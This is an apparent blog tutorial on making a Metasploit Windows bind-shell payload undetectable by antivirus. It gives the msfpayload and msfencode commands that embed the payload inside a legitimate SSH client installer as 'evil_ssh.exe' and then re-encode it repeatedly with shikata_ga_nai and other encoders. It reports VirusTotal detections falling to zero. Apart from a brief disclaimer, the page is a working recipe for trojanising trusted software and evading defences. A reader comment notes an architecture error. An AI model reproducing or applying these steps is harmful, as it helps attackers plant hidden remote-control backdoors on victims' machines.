How To Bypass EXE File’s Antivirus Detection Using Metasploit (FUD)


In this tutorial we will show you step by step on how to make a virus Fully Undetectable from all the antiviruses. Their are lots of approaches, however here we will take a look at how to make an executable FUD using msfencode.

Requirements :   Metasploit (comes on BackTrack or Kali)


Attention
We are using some harmless test files but don’t infect people with any real viruses. That would be a crime.

Purpose

Antivirus protects machines from malware but not all of it .there are ways to pack malware to make it harder to detect. well use metasploit to render malware completely invisible to antivirus.

Creating a Listener

This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won’t spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands:
cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe
You should see the listen.exe file as shown below:

Analyzing the Listener with VirusTotal

Click the “Choose File” button. Navigate to /root and double-click the listen.exe “listen.exe” appears in the “Choose File” box, as shown below:
In the virustotal web page , Click the “scan it” button!
If you see a “File already analyzed” message, click the “View last analysis” button.
The analysis shows that many of the antivirus engines detected the file: 33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Encoding the Listener

this process will encode the listener, & insert it into an innocent SSH file.
In BackTrack/Kali, in a Terminal window, execute these commands:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1ls -l evil*

You should see the evil-ssh.exe file as shown below :
Scan with virusTOTAL
If you see a “File already analyzed” message, click the “View last analysis” button.
The analysis shows that fewer of the antivirus engines detect the file now: 21 out of 42, when I did it, as shown below. You may see different numbers.
Encode the Listener Again This process will encode the listener with several different encodings.
In BackTrack/Kali, in a Terminal window, execute these commands:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1ls -l listen*
 You should see several files as shown below:

Analyzing Again

The analysis shows that fewer of the antivirus engines detect the file now 0 out of 42 When I did it as shown below. you may see different numbers.
You are done.

Sharing is caring!

One thought on “How To Bypass EXE File’s Antivirus Detection Using Metasploit (FUD)

  1. after following the procedure and run the file in windows x64 , an error occurred " " This verison of this file is not compatible with the version of Windows you're running . Check your computer's system information to see Whether you need an x86 ( 32-bit) or x64 (64- bit) verion of the program . "

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts

Begin typing your search above and press enter to search. Press ESC to cancel.

Back To Top

So glad to see you sticking around!

Want to be the first one to receive the new stuff?

Enter your email address below and we'll send you the goodies straight to your inbox.

Thank You For Subscribing

This means the world to us!

Spamming is not included! Pinky promise.